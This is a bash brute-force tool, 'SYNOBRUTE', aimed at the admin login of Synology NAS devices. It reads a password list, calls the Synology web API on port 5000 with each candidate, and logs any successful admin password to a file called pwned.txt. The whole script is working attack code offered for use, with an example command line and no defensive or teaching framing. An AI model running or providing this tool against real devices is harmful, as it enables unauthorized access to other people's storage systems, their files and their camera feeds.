brute force synology

1. #!/bin/bash
2. echo "███████╗██╗ ██╗███╗ ██╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗████████╗███████╗"
3. echo "██╔════╝╚██╗ ██╔╝████╗ ██║██╔═══██╗██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝"
4. echo "███████╗ ╚████╔╝ ██╔██╗ ██║██║ ██║██████╔╝██████╔╝██║ ██║ ██║ █████╗ "
5. echo "╚════██║ ╚██╔╝ ██║╚██╗██║██║ ██║██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ "
6. echo "███████║ ██║ ██║ ╚████║╚██████╔╝██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗"
7. echo "╚══════╝ ╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝"
8. echo " "
9. echo "SYNOBRUTE - evolutio - 2018"
10.  
11. date
12. echo ""
13. echo " ./bruteforce.sh password.txt 192.168.1.101"
14. echo ""
15. cat $1 | while read output
16. do
17. [[ -z "$1" ]] && { echo "Parameter 1 is empty - fichier.txt " ; exit 1; }
18. [[ -z "$2" ]] && { echo "Parameter 2 is empty - ip_adress_nas " ; exit 1; }
19. echo "tentative avec le mot de passe $output sur $2"
20. syno_user="admin"
21. syno_pwd=$output
22. syno_url=$2 # eg 192.168.1.100
23. vAuth=2
24. touch pwned.txt
25. # Get Paths (recommended by Synology for further update)
26. curlResult=$(curl -s "http://${syno_url}:5000/webapi/query.cgi?api=SYNO.API.Info&method=Query&version=1&query=SYNO.API.Auth,SYNO.SurveillanceStation.Camera")
27. authPath=$(echo "$curlResult" | jq -r '.["data"]["SYNO.API.Auth"]["path"]')
28. # login
29. curlResult=$(curl -s "http://${syno_url}:5000/webapi/${authPath}?api=SYNO.API.Auth&method=Login&version=${vAuth}&account=${syno_user}&passwd=${syno_pwd}&session=SurveillanceStation&format=sid")
30. if [[ $(echo "$curlResult" | jq -r '.["success"]') == 'true' ]]; then
31. echo -e "\033[32m ----------------------------------- \033[0m"
32. echo -e "\033[32m succes login for $syno_url \033[0m"
33. echo -e "\033[32m ----------------------------------- \033[0m"
34. echo ""
35. echo "login is admin $output" >> pwned.txt
36. exit 0
37. fi
38. if [[ $(echo "$curlResult" | jq -r '.["success"]') == 'false' ]]; then
39. echo -e "\033[31mError on login : bad password !!! \033[0m"
40. echo ""
41. else
42. echo -e "\033[31mError on login \033[0m"
43. echo ""
44. fi
45. SID=$(echo "$curlResult" | jq -r '.["data"]["sid"]')
46. curl -s "http://${syno_url}:5000/webapi/${authPath}?api=SYNO.API.Auth&method=Logout&version=${vAuth}&_sid=${SID}" > /dev/null 2>&1
47. done